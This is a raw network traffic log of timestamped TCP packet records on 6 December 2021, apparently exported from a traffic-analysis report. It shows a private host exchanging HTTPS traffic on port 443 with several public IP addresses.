Dec 6, 2021 19:08:33.608613014 CET	443	49712	52.217.81.204	192.168.2.3
Dec 6, 2021 19:08:33.608782053 CET	49712	443	192.168.2.3	52.217.81.204
Dec 6, 2021 19:08:33.610582113 CET	49712	443	192.168.2.3	52.217.81.204
Dec 6, 2021 19:08:33.610608101 CET	443	49712	52.217.81.204	192.168.2.3
Dec 6, 2021 19:08:34.049474955 CET	443	49712	52.217.81.204	192.168.2.3
Dec 6, 2021 19:08:34.049648046 CET	49712	443	192.168.2.3	52.217.81.204
Dec 6, 2021 19:08:34.058151007 CET	49712	443	192.168.2.3	52.217.81.204
Dec 6, 2021 19:08:34.058173895 CET	443	49712	52.217.81.204	192.168.2.3
Dec 6, 2021 19:08:34.058496952 CET	443	49712	52.217.81.204	192.168.2.3
Dec 6, 2021 19:08:34.058598995 CET	49712	443	192.168.2.3	52.217.81.204
Dec 6, 2021 19:08:34.059144020 CET	49712	443	192.168.2.3	52.217.81.204
Dec 6, 2021 19:08:34.100872040 CET	443	49712	52.217.81.204	192.168.2.3
Dec 6, 2021 19:08:34.230309010 CET	443	49712	52.217.81.204	192.168.2.3
Dec 6, 2021 19:08:34.230396986 CET	443	49712	52.217.81.204	192.168.2.3
Dec 6, 2021 19:08:34.230463982 CET	49712	443	192.168.2.3	52.217.81.204
Dec 6, 2021 19:08:34.230473042 CET	443	49712	52.217.81.204	192.168.2.3
Dec 6, 2021 19:08:34.230510950 CET	443	49712	52.217.81.204	192.168.2.3
Dec 6, 2021 19:08:34.230530977 CET	49712	443	192.168.2.3	52.217.81.204
Dec 6, 2021 19:08:34.230597973 CET	443	49712	52.217.81.204	192.168.2.3
Dec 6, 2021 19:08:34.230600119 CET	49712	443	192.168.2.3	52.217.81.204
Dec 6, 2021 19:08:34.230689049 CET	49712	443	192.168.2.3	52.217.81.204
Dec 6, 2021 19:08:34.231493950 CET	49712	443	192.168.2.3	52.217.81.204
Dec 6, 2021 19:08:34.231519938 CET	443	49712	52.217.81.204	192.168.2.3
Dec 6, 2021 19:08:51.826280117 CET	49713	443	192.168.2.3	142.250.185.109
Dec 6, 2021 19:08:51.826339006 CET	443	49713	142.250.185.109	192.168.2.3
Dec 6, 2021 19:08:51.826446056 CET	49713	443	192.168.2.3	142.250.185.109
Dec 6, 2021 19:08:51.826945066 CET	49713	443	192.168.2.3	142.250.185.109
Dec 6, 2021 19:08:51.826972008 CET	443	49713	142.250.185.109	192.168.2.3
Dec 6, 2021 19:08:51.828838110 CET	49715	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:51.828896046 CET	443	49715	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:51.828990936 CET	49715	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:51.829207897 CET	49715	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:51.829233885 CET	443	49715	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:51.834758043 CET	49716	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:51.834806919 CET	443	49716	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:51.834930897 CET	49716	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:51.835205078 CET	49716	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:51.835225105 CET	443	49716	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:51.879303932 CET	443	49713	142.250.185.109	192.168.2.3
Dec 6, 2021 19:08:51.879723072 CET	49713	443	192.168.2.3	142.250.185.109
Dec 6, 2021 19:08:51.879791975 CET	443	49713	142.250.185.109	192.168.2.3
Dec 6, 2021 19:08:51.880830050 CET	443	49713	142.250.185.109	192.168.2.3
Dec 6, 2021 19:08:51.881655931 CET	49713	443	192.168.2.3	142.250.185.109
Dec 6, 2021 19:08:51.888830900 CET	443	49715	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:51.894992113 CET	443	49716	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:51.901869059 CET	49715	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:51.901905060 CET	443	49715	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:51.902465105 CET	49716	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:51.902484894 CET	443	49716	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:51.902884007 CET	443	49716	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:51.902968884 CET	49716	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:51.903678894 CET	443	49716	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:51.903696060 CET	443	49715	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:51.903769016 CET	49716	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:51.903801918 CET	49715	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.076075077 CET	49717	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.076102972 CET	443	49717	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.076173067 CET	49717	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.076513052 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.076561928 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.076618910 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.076798916 CET	49717	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.076813936 CET	443	49717	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.077049017 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.077068090 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.125705957 CET	443	49717	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.125864029 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.130283117 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.130348921 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.130362988 CET	49717	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.130420923 CET	443	49717	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.133385897 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.133476019 CET	443	49717	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.133503914 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.133564949 CET	49717	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.164025068 CET	49716	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:52.164300919 CET	49713	443	192.168.2.3	142.250.185.109
Dec 6, 2021 19:08:52.164486885 CET	443	49716	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:52.164597988 CET	49716	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:52.164623976 CET	443	49716	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:52.164690971 CET	443	49713	142.250.185.109	192.168.2.3
Dec 6, 2021 19:08:52.164735079 CET	49713	443	192.168.2.3	142.250.185.109
Dec 6, 2021 19:08:52.164983988 CET	49715	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.165148973 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.165235043 CET	49717	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.165386915 CET	49715	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.165396929 CET	443	49715	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.165446043 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.165472031 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.165503025 CET	443	49717	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.165561914 CET	49717	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.196631908 CET	443	49716	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:52.196718931 CET	49716	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:52.196741104 CET	443	49716	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:52.196805954 CET	443	49716	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:52.196865082 CET	49716	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:52.198741913 CET	49716	443	192.168.2.3	142.250.186.78
Dec 6, 2021 19:08:52.198765039 CET	443	49716	142.250.186.78	192.168.2.3
Dec 6, 2021 19:08:52.204891920 CET	443	49713	142.250.185.109	192.168.2.3
Dec 6, 2021 19:08:52.205418110 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.205465078 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.205537081 CET	49713	443	192.168.2.3	142.250.185.109
Dec 6, 2021 19:08:52.205538034 CET	49715	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.205557108 CET	443	49713	142.250.185.109	192.168.2.3
Dec 6, 2021 19:08:52.205578089 CET	443	49715	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.208898067 CET	443	49717	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.216661930 CET	443	49713	142.250.185.109	192.168.2.3
Dec 6, 2021 19:08:52.216814041 CET	443	49713	142.250.185.109	192.168.2.3
Dec 6, 2021 19:08:52.216881037 CET	49713	443	192.168.2.3	142.250.185.109
Dec 6, 2021 19:08:52.216921091 CET	49713	443	192.168.2.3	142.250.185.109
Dec 6, 2021 19:08:52.218060017 CET	49713	443	192.168.2.3	142.250.185.109
Dec 6, 2021 19:08:52.218096972 CET	443	49713	142.250.185.109	192.168.2.3
Dec 6, 2021 19:08:52.220860958 CET	49715	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.221280098 CET	443	49715	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.221349955 CET	443	49715	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.221370935 CET	49715	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.221400023 CET	49715	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.224826097 CET	443	49717	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.224922895 CET	49717	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.232472897 CET	49717	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.232512951 CET	443	49717	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.245441914 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.248393059 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.248486042 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.248542070 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.248577118 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.248593092 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.248636007 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.248656034 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.249306917 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.249362946 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.249383926 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.249413013 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.249469042 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.250576973 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.251910925 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.251965046 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.251993895 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.252019882 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.252070904 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.253248930 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.267082930 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.267152071 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.267266035 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.267309904 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.267627954 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.267705917 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.267723083 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.268268108 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.268937111 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.270205975 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.270282030 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.270353079 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.270371914 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.271576881 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.271655083 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.271668911 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.271723032 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.272836924 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.274194956 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.274293900 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.274368048 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.274386883 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.275544882 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.275624990 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.275650024 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.276310921 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.276835918 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.277998924 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.278059959 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.278079033 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.278119087 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.278224945 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.279238939 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.280476093 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.280539036 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.280544996 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.280563116 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.280615091 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.281657934 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.282772064 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.282876015 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.282952070 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.282969952 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.283066034 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.285888910 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.286410093 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.286472082 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.286478996 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.286494970 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.286549091 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.287650108 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.288784027 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.288870096 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.288877964 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.288892984 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.288964033 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.289896965 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.290970087 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.291029930 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.291094065 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.291104078 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.292049885 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.292114973 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.292124987 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.293059111 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.293217897 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.293229103 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.293276072 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.293946981 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.294934034 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.294994116 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.295001984 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.295016050 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.295495987 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.295984030 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.296930075 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.297009945 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.297032118 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.297049999 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.297118902 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.297890902 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.298886061 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.298949957 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.299021006 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.299034119 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.299829960 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.299895048 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.299905062 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.300653934 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.300721884 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.300731897 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.300776958 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.301486015 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.302249908 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.302309036 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.302313089 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.302335978 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.302386045 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.302989960 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.303791046 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.303848028 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.303906918 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.303917885 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.303966999 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.304543018 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.305294991 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.305350065 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.305370092 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.305382013 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.305433989 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.306024075 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.306765079 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.306862116 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.306924105 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.306937933 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.306993008 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.307341099 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.307441950 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.307501078 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.307559013 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.307569981 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.308264017 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.308279991 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.308379889 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.308438063 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.308439016 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.308458090 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.308511972 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.309154987 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.309248924 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.309319019 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.309382915 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.309393883 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.309442043 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.310142040 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.310235023 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.310305119 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.310364008 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.310375929 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.310631990 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.310992956 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.311476946 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.311542034 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.311602116 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.311602116 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.311623096 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.311671972 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.311682940 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.312007904 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.312405109 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.312494993 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.312567949 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.312570095 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.312587976 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.312680006 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.313342094 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.313438892 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.313496113 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.313498974 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.313513994 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.313570023 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.314178944 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.314313889 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.314372063 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.314431906 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.314443111 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.314687967 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.315085888 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.315287113 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:52.315355062 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.348359108 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.350960016 CET	49718	443	192.168.2.3	142.250.181.228
Dec 6, 2021 19:08:52.350991964 CET	443	49718	142.250.181.228	192.168.2.3
Dec 6, 2021 19:08:56.438443899 CET	49725	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:56.438513041 CET	443	49725	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:56.438623905 CET	49725	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:56.438900948 CET	49725	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:56.438931942 CET	443	49725	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:56.503242970 CET	443	49725	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:56.503616095 CET	49725	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:56.503675938 CET	443	49725	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:56.504024029 CET	443	49725	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:56.504106045 CET	49725	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:56.505064964 CET	443	49725	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:56.505198956 CET	49725	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:56.507069111 CET	49725	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:56.507165909 CET	443	49725	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:56.507260084 CET	49725	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:56.533441067 CET	443	49725	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:56.533485889 CET	443	49725	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:56.533607960 CET	49725	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:56.533649921 CET	443	49725	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:56.533732891 CET	49725	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:56.534234047 CET	443	49725	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:56.535691977 CET	443	49725	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:56.535738945 CET	443	49725	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:56.535804987 CET	49725	443	192.168.2.3	142.250.186.65
Dec 6, 2021 19:08:56.535844088 CET	443	49725	142.250.186.65	192.168.2.3
Dec 6, 2021 19:08:56.535906076 CET	49725	443	192.168.2.3	142.250.186.65
